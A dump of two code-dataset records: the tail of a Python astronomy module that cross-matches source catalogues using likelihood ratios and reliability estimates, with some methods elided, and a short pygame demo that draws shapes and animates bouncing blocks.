distribution of all counterparts in the\n        secondary catalogue to determine the magnitude distribution of the\n        true associations.\n\n        Parameters\n        ----------\n        sidx : numpy ``ndarray``\n            Indexes of the counterparts in the secondary catalogue.\n        mags : `list` of catalogue column names, or combinations of them;\n            a combination is itself a `list` of column names.\n        magmin : `float`, optional\n            Lower magnitude limit when estimating magnitude distributions.\n        magmax : `float`, optional\n            Upper magnitude limit when estimating magnitude distributions.\n        magbinsize : `float`, optional\n            Magnitude bin width when estimating magnitude distributions.\n        method : 'random' or 'mask'\n            Method for estimating the magnitude distribution of spurious\n            matches. 
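With\n            'mask', sources close to the primary positions are excised and the\n            remaining magnitude distribution is scaled by the unmasked area;\n            with 'random', the counterparts of randomised positions are used\n            directly. 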
See the documentation of ``run`` method for details.\n\n Return\n ------\n priors : ``Prior``\n Object containing the magnitude probability distributions of \"true\"\n and \"spurious\" sources for each available magnitude in the\n secondary catalogue.\n \"\"\"\n #print(magmin, magmax, magbinsize)\n \n if method == 'mask':\n rndcat = False\n elif method == 'random':\n rndcat = self.pcat.randomise(numrepeat=self.random_numrepeat, seed=seed)\n else:\n raise ValueError('Unknown method: {}'.format(method))\n\n priors = PriorND(self.pcat, self.scat, rndcat, self.radius, mags, \n magmin, magmax, magbinsize, self.scat.mags[sidx])\n\n #priors.plot(\"prior0\")\n return priors\n\n def _likelihood_ratio(self, pidx, sidx, d2d):\n \"\"\"\n Estimates the likelihood ratio for all counterparts and for each\n magnitude band.\n\n Parameters\n ----------\n pidx : numpy ``ndarray``\n Indexes of the primary sources with counterparts in the\n secondary catalogue.\n sidx : numpy ``ndarray``\n Indexes of the counterparts in the secondary catalogue.\n d2d : numpy ``ndarray``\n Distance between the primary source and the counterpart in the\n secondary catalogue.\n\n Return\n ------\n lr : Astropy ``Table``\n Table with the likelihood ratios for each counterpart and each\n available magnitude in the secondary catalogue.\n \"\"\"\n pcat_idcol = 'SRCID_{}'.format(self.pcat.name)\n scat_idcol = 'SRCID_{}'.format(self.scat.name)\n drcol = 'Separation_{}_{}'.format(self.pcat.name, self.scat.name)\n\n lr = Table()\n lr[pcat_idcol] = self.pcat.ids[pidx]\n lr[scat_idcol] = self.scat.ids[sidx]\n lr[drcol] = d2d.to(u.arcsec)\n\n #print(self.pcat.ids[pidx])\n #print(self.scat.ids[sidx])\n #print(d2d.to(u.arcsec))\n\n # AGE: if cata has no ids it fails with lr['ncat']=2\n lr['ncat'] = [2] * len( lr[pcat_idcol] )\n lr['PEF'] = self._pos_err_function(d2d, pidx, sidx)\n\n #self._qnterms(lr, self.scat.mags[sidx])\n self._lrND(lr, self.scat.mags[sidx])\n\n # For estimating the reliability, the table has to be grouped.\n # Note that this changes the order of the rows!!!\n lr = lr.group_by(pcat_idcol)\n\n self._reliabilityND(lr)\n\n self._p_any_bestND(lr)\n lr_all = lr.copy()\n\n final_columns = [pcat_idcol, scat_idcol, drcol, 'ncat',\n 'LR_BEST', 'REL_BEST', 'LR_BEST_MAG',\n 'prob_has_match', 'prob_this_match',\n ]\n lr.keep_columns(final_columns)\n\n return lr, lr_all\n\n ### methods for _likelihood_ratio\n def _pos_err_function(self, radius, pidx, sidx):\n\n if(self.poserr_dist.lower()==\"normal\"):\n return self._pos_err_function_normal(radius, pidx, sidx)\n elif(self.poserr_dist.lower()==\"rayleigh\"):\n return self._pos_err_function_rayleigh(radius, pidx, sidx)\n else:\n raise ValueError('Unknown method: {}'.format(self.poserr_dist))\n\n \n def _pos_err_function_rayleigh(self, radius, pidx, sidx):\n # radius is offset between opt/xray counter in arcsec\n # I assume that the pos is Gaussian.\n # NOTE: This returns prob per square *arcsec* !!!!\n ppos_error = self.pcat.poserr[pidx].as_array()\n spos_error = self.scat.poserr[sidx].as_array()\n\n # Rayleigh\n sigma2 = ppos_error**2 + spos_error**2\n exponent = -radius**2 / sigma2 \n return np.exp(exponent) / sigma2 * 2 * radius\n \n \n def _pos_err_function_normal(self, radius, pidx, sidx):\n # radius is offset between opt/xray counter in arcsec\n # I assume that the pos is Gaussian.\n # NOTE: This returns prob per square *arcsec* !!!!\n ppos_error = self.pcat.poserr[pidx].as_array()\n spos_error = self.scat.poserr[sidx].as_array()\n\n # Gaussian\n sigma2 = ppos_error**2 + 
spos_error**2\n exponent = -radius**2 / (2*sigma2)\n\n return np.exp(exponent) / (2*np.pi*sigma2)\n \n\n def _lrND(self, lr_table, mags):\n\n # here the loop is over .priors.dict_prior.keys\n # then for each [name] I define arrays\n # I define tuples and the get the results from\n # the prior. \n \n for col in self._priors.prior_dict.keys():\n #print(col, self._priors.prior_dict.keys()\n qterm = self._priors.interp(mags, col)\n nterm = self._bkg.interp(mags, col)\n \n \n m = nterm ==0 \n lr_table['LR_' + col] = lr_table['PEF'] * qterm / nterm\n\n # if nterm == 0 then do not assign a lr\n lr_table['LR_' + col][m]=0.0\n \n #print(col, qterm, nterm)\n #for i in range(len(qterm)):\n # print(mags[i], qterm[i], nterm[i], lr_table['PEF'], lr_table['LR_'+col][i])\n \n\n def _reliabilityND(self, lr_table):\n group_size = np.diff(lr_table.groups.indices)\n\n \n\n QCAP = []\n for col in self._priors.prior_dict.keys():\n # Overall identification ratio\n q = self._priors.qcap(col)\n QCAP.append(q)\n\n # Add all values of LR for each group, i.e., all\n # matches for a source of the primary catalogue.\n sumlr = lr_table['LR_' + col].groups.aggregate(np.sum)\n #print(sumlr.shape)\n # The previous array has a length equal to the number of groups.\n # We need to rebuild the array having the same length as the\n # original table for using element-wise operations. We repeat\n # each element of sumlr as many times as the size of the\n # corresponding group\n sumlr = np.repeat(sumlr, group_size)\n #print(sumlr.shape)\n lr_table['REL_' + col] = lr_table['LR_' + col] / (sumlr + (1-q))\n\n # Probability that the primary source has a counterpart in magcol\n # i.e. the sum of reliabilities for all matches of a given source\n sumrel = lr_table['REL_' + col].groups.aggregate(np.sum)\n sumrel = np.repeat(sumrel, group_size)\n lr_table['p_any_' + col] = sumrel\n\n # Relative probability for a given counterpart\n lr_table['p_i_' + col] = (lr_table['REL_' + col] /\n lr_table['p_any_' + col])\n\n print(QCAP)\n #for g in lr_table.groups:\n # print(lr_table['LR_' + col])\n \n lr_table.meta['QCAP'] = str(QCAP)\n #lr_table.write(\"e.fits\", format='fits', overwrite=True)\n \n def _p_any_bestND(self, lr_table):\n pa_array = np.ndarray((len(lr_table), len(self._priors.prior_dict)))\n pi_array = np.ndarray((len(lr_table), len(self._priors.prior_dict)))\n lr_array = np.ndarray((len(lr_table), len(self._priors.prior_dict)))\n rel_array = np.ndarray((len(lr_table), len(self._priors.prior_dict)))\n\n names=[]\n for i, col in enumerate(self._priors.prior_dict.keys()):\n lr_array[:, i] = lr_table['LR_' + col]\n rel_array[:, i] = lr_table['REL_' + col]\n pa_array[:, i] = lr_table['p_any_' + col]\n pi_array[:, i] = lr_table['p_i_' + col]\n names.append(col)\n names=np.array(names)\n idx_pbest = np.argmax(pa_array, axis=1)\n #print(idx_pbest)\n #print(names[idx_pbest])\n uidx_pbest = (np.arange(len(lr_table)), idx_pbest)\n\n lr_table['LR_BEST'] = lr_array[uidx_pbest]\n lr_table['REL_BEST'] = rel_array[uidx_pbest]\n lr_table['LR_BEST_MAG'] = [names[i].encode('utf8')\n for i in idx_pbest]\n lr_table['prob_has_match'] = pa_array[uidx_pbest]\n lr_table['prob_this_match'] = pi_array[uidx_pbest]\n\n\n def plot_stats(self, stats, ext):\n \n import matplotlib.pyplot as plt\n from matplotlib.backends.backend_pdf import PdfPages\n from matplotlib.ticker import MultipleLocator, FormatStrFormatter\n\n plotfile = os.path.join(self.MHDR, self.dirs['FIELDS'], self.id, 'LR', 'stats-{}_{}.pdf'.format(self.id, ext))\n \n fontPanel = {'family': 'serif',\n 
'color': 'black',\n                     'weight': 'bold',\n                     'size': 10,}\n\n        figall = []\n        pdf = PdfPages(plotfile)\n        fig, ax = plt.subplots(1, 1)\n        y = stats['completeness']\n        x = stats['cutoff']\n        ax.plot(x, y, 'r-', label=\"completeness\")\n        y = stats['reliability']\n        ax.plot(x, y, 'b--', label=\"purity\")\n\n        for axis in ['top', 'bottom', 'left', 'right']:\n            for a in [ax]:\n                a.spines[axis].set_linewidth(2)\n                a.tick_params(labelsize=12)\n                a.xaxis.set_tick_params(which='major', width=1.5, size=8)\n                a.yaxis.set_tick_params(which='major', width=1.5, size=8)\n                a.xaxis.set_tick_params(which='minor', width=1.5, size=5)\n                a.yaxis.set_tick_params(which='minor', width=1.5, size=5)\n\n        xmax = 3\n        m = stats['cutoff'] < xmax\n        # [... remainder of the plotting code missing from this snippet ...]\n\n    def _final_table(self, lr, prob_ratio_secondary):\n        # [... beginning of the method missing from this snippet: it builds\n        # the `match` table, flags the primary matches, and defines `mask`,\n        # `pi_max` and `mask_ratio` ...]\n        mask = np.logical_and(~mask, mask_ratio)\n        match['match_flag'][mask] = 2\n\n        ## Flag as secondary matches with multiple counterparts\n        ## with LR_BEST == 0 and pi_max == 0\n        mask = np.logical_and(match['ncat'] > 1, match['LR_BEST'] == 0.0)\n        mask = np.logical_and(mask, pi_max == 0)\n        match['match_flag'][mask] = 2\n\n        return match\n\n    def _sort(self, match):\n        # Sort final table as the primary catalogue.\n        # We need to pass the column in pcat with the source ids.\n        return self._sort_as_pcat(match, match.colnames[0])\n\n    ### ===\n\n    def _match_rndcat(self, **kwargs):\n        # Cross-match secondary catalogue with a randomized\n        # version of the primary catalogue\n        original_pcat = deepcopy(self.pcat)\n        self.pcat = self.pcat.randomise(numrepeat=1)\n\n        # Hide std output of lr match\n        with redirect_stdout(open(os.devnull, \"w\")):\n            mcat_pidx, mcat_sidx, mcat_d2d = self._candidates()\n\n            lr, _ = self._likelihood_ratio(mcat_pidx, mcat_sidx, mcat_d2d)\n\n            # The value for prob_ratio_secondary doesn't matter here,\n            # because secondary matches are not used for the statistics\n            match_rnd = self._final_table(lr, prob_ratio_secondary=0.5)\n\n        # Recover original pcat\n        self.pcat = original_pcat\n\n        return match_rnd\n\n    def _match_fake(self, candidates, **kwargs):\n        # Cross-match a randomized version of the primary catalogue\n        # with a secondary catalogue where fake counterparts for the primary\n        # have been introduced. This is for calculating statistics using\n        # the Broos et al. 
2006 method.\n        original_pcat = deepcopy(self.pcat)\n        original_scat = deepcopy(self.scat)\n\n        self.pcat = self.pcat.randomise(numrepeat=1)\n\n        # Create a set of fake counterparts for the primary catalogue\n        fakes = self.pcat.set_fake_counterparts(candidates)\n\n        # Remove candidates from the secondary catalogue\n        scat_nocandidates = self.scat.remove_by_id(candidates.ids)\n\n        # Set as secondary catalogue the union of the candidates-removed\n        # secondary catalogue with the catalogue of fake counterparts\n        self.scats[0] = scat_nocandidates.join(fakes)\n\n        # Hide std output of lr match\n        with redirect_stdout(open(os.devnull, \"w\")):\n            mcat_pidx, mcat_sidx, mcat_d2d = self._candidates()\n\n            lr, _ = self._likelihood_ratio(mcat_pidx, mcat_sidx, mcat_d2d)\n\n            # The value for prob_ratio_secondary doesn't matter here,\n            # because secondary matches are not used for the statistics\n            match_rnd = self._final_table(lr, prob_ratio_secondary=0.5)\n\n        # Recover original catalogues\n        self.pcat = original_pcat\n        self.scats[0] = original_scat\n\n        return match_rnd\n","sub_path":"astromatch/lr.py","file_name":"lr.py","file_ext":"py","file_size_in_byte":31171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"38222782","text":"import pygame, sys, time\nfrom pygame.locals import *\nimport random as r\nimport math as m\n\nclass myPygame:\n\n    pDef = {\n        'BLACK' : (0, 0, 0),\n        'WHITE' : (255, 255, 255),\n        'RED' : (255, 0, 0),\n        'GREEN' : (0, 255, 0),\n        'BLUE' : (0, 0, 255),\n        'WIDTH' : 500,\n        'HEIGHT' : 400\n    }\n\n    def __init__(self, **kwargs):\n        for arg, value in kwargs.items():\n            if arg not in myPygame.pDef:\n                raise ValueError('%s not a valid param for myPygame()' % arg)\n            myPygame.pDef[arg] = value\n\n        for arg, value in myPygame.pDef.items():\n            setattr(self, arg, value)\n\n        # start the moving-blocks animation demo\n        self.movingBlocks()\n\n    def shapesExample(self):\n        pygame.init()\n        # set up the window\n        windowSurface = pygame.display.set_mode((self.pDef['WIDTH'], self.pDef['HEIGHT']), 0, 32)\n        pygame.display.set_caption('Hello world!')\n        # set up fonts\n        basicFont = pygame.font.SysFont(None, 48)\n        # set up the text\n        text = basicFont.render('Hello world!', True, self.pDef['WHITE'], self.pDef['BLUE'])\n        textRect = text.get_rect()\n        textRect.centerx = windowSurface.get_rect().centerx\n        textRect.centery = windowSurface.get_rect().centery\n        # draw the white background onto the surface\n        windowSurface.fill(self.pDef['WHITE'])\n        # draw a green polygon onto the surface\n        pygame.draw.polygon(windowSurface, self.pDef['GREEN'], ((146, 0), (291, 106), (236, 277), (56, 277), (0, 106)))\n        # draw some blue lines onto the surface\n        pygame.draw.line(windowSurface, self.pDef['BLUE'], (60, 60), (120, 60), 4)\n        pygame.draw.line(windowSurface, self.pDef['BLUE'], (120, 60), (60, 120))\n        pygame.draw.line(windowSurface, self.pDef['BLUE'], (60, 120), (120, 120), 4)\n        # draw a blue circle onto the surface\n        pygame.draw.circle(windowSurface, self.pDef['BLUE'], (300, 50), 20, 0)\n        # draw a red ellipse onto the surface\n        pygame.draw.ellipse(windowSurface, self.pDef['RED'], (300, 250, 40, 80), 1)\n        # draw the text's background rectangle onto the surface\n        pygame.draw.rect(windowSurface, self.pDef['RED'], (textRect.left - 20, textRect.top - 20, textRect.width + 40, textRect.height + 40))\n        # get a pixel array of the surface\n        pixArray = pygame.PixelArray(windowSurface)\n        pixArray[479][380] = self.pDef['BLACK']\n        pixArray[480][380] = self.pDef['BLACK']\n        pixArray[481][380] = self.pDef['BLACK']\n        
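# together with the three assignments above, the six below paint a 3x3 black square centred on pixel (480, 380)\n        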
pixArray[479][379] = self.pDef['BLACK']\n        pixArray[480][379] = self.pDef['BLACK']\n        pixArray[481][379] = self.pDef['BLACK']\n        pixArray[479][381] = self.pDef['BLACK']\n        pixArray[480][381] = self.pDef['BLACK']\n        pixArray[481][381] = self.pDef['BLACK']\n        del pixArray\n        # draw the text onto the surface\n        windowSurface.blit(text, textRect)\n        # draw the window onto the screen\n        pygame.display.update()\n        # run the game loop\n        while True:\n            for event in pygame.event.get():\n                if event.type == QUIT:\n                    pygame.quit()\n                    sys.exit()\n\n    def movingBlocks(self):\n        # set up pygame\n        pygame.init()\n        # set up the window\n        windowSurface = pygame.display.set_mode((self.pDef['WIDTH'], self.pDef['HEIGHT']), 0, 32)\n        pygame.display.set_caption('Animation')\n        # set up direction variables\n        DOWNLEFT = 1\n        DOWNRIGHT = 3\n        UPLEFT = 7\n        UPRIGHT = 9\n        MOVESPEED = 4\n        # set up the block data structure\n        b1 = {'rect':pygame.Rect(300, 80, 50, 100), 'color':self.pDef['RED'], 'dir':UPRIGHT}\n        b2 = {'rect':pygame.Rect(200, 200, 20, 20), 'color':self.pDef['GREEN'], 'dir':UPLEFT}\n        b3 = {'rect':pygame.Rect(100, 150, 60, 60), 'color':self.pDef['BLUE'], 'dir':DOWNLEFT}\n        blocks = [b1, b2, b3]\n        # run the game loop\n        while True:\n            # check for the QUIT event\n            for event in pygame.event.get():\n                if event.type == QUIT:\n                    pygame.quit()\n                    sys.exit()\n            # draw the black background onto the surface\n            windowSurface.fill(self.pDef['BLACK'])\n            for b in blocks:\n                # move the block data structure\n                if b['dir'] == DOWNLEFT:\n                    b['rect'].left -= MOVESPEED\n                    b['rect'].top += MOVESPEED\n                if b['dir'] == DOWNRIGHT:\n                    b['rect'].left += MOVESPEED\n                    b['rect'].top += MOVESPEED\n                if b['dir'] == UPLEFT:\n                    b['rect'].left -= MOVESPEED\n                    b['rect'].top -= MOVESPEED\n                if b['dir'] == UPRIGHT:\n                    b['rect'].left += MOVESPEED\n                    b['rect'].top -= MOVESPEED\n                # check if the block has moved out of the window\n                if b['rect'].top < 0:\n                    # block has moved past the top\n                    if b['dir'] == UPLEFT:\n                        b['dir'] = DOWNLEFT\n                    if b['dir'] == UPRIGHT:\n                        b['dir'] = DOWNRIGHT\n                if b['rect'].bottom > self.pDef['HEIGHT']:\n                    # block has moved past the bottom\n                    if b['dir'] == DOWNLEFT:\n                        b['dir'] = UPLEFT\n                    if b['dir'] == DOWNRIGHT:\n                        b['dir'] = UPRIGHT\n                if b['rect'].left < 0:\n                    # block has moved past the left side\n                    if b['dir'] == DOWNLEFT:\n                        b['dir'] = DOWNRIGHT\n                    if b['dir'] == UPLEFT:\n                        b['dir'] = UPRIGHT\n                if b['rect'].right > self.pDef['WIDTH']:\n                    # block has moved past the right side\n                    if b['dir'] == DOWNRIGHT:\n                        b['dir'] = DOWNLEFT\n                    if b['dir'] == UPRIGHT:\n                        b['dir'] = UPLEFT\n                # draw the block onto the surface\n                pygame.draw.rect(windowSurface, b['color'], b['rect'])\n            # draw the window onto the screen\n            pygame.display.update()\n            time.sleep(0.02)\n\n\nif __name__ == \"__main__\":\n    game = myPygame()\n","sub_path":"myPygame/myGame.py","file_name":"myGame.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}